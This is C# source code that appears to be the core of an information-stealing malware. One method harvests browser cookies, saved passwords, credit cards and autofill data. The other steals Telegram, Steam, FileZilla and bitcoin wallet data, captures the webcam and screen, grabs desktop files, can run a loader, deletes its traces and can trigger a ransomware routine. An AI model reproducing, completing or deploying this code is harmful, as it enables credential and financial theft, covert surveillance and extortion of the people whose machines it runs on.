public static void Parse(string dir) { Directory.CreateDirectory($"{dir}\\Browsers"); Mozila.Mozila_still(); try { foreach (string rootPath in GetProfile()) { try { string fullName = new FileInfo(rootPath).Directory.FullName; string text = rootPath.Contains(RoamingAppData) ? GetRoadData(fullName) : GetLclName(fullName); if (!string.IsNullOrEmpty(text)) { text = text[0].ToString().ToUpper() + text.Remove(0, 1); string name = GetName(fullName); GetCookies.Cookie_Grab(fullName, text, name); GetPasswords.Passwords_Grab(fullName, text, name); GetPasswords.Write_Passwords(); Get_Credit_Cards.Get_CC(fullName, text, name); Get_Credit_Cards.Write_CC(text, name); Get_Browser_Autofill.Get_Autofill(fullName, text, name); Get_Browser_Autofill.Write_Autofill(text, name); } } catch { } } } catch { } }
private static void Main() { Directory.CreateDirectory(dir); HomeDirectory.Create(GetDirPath.User_Name, true); if (Settings.webka) { GetWebCam.Get_webcam(); } Screen.Get_scr(dir); FileZilla.get_filezilla(dir); Telegram.StealTelegram(dir); if (Settings.steam) { Steam.StealSteam(dir); } if (Settings.loader) { Loader.Load(); } if (Settings.grabber) { Grabber.Grab_desktop(dir); } Mozila.Mozila_still(); Wallets.BitcoinSteal(dir); UserAgents.Get_agent(dir); Browser_Parse.Parse(dir); Hardware.Info(dir); Directory.Delete(dir, true); Directory.Delete(GetDirPath.User_Name, true); if (Settings.ransomware) { RansomwareCrypt.Start(); } }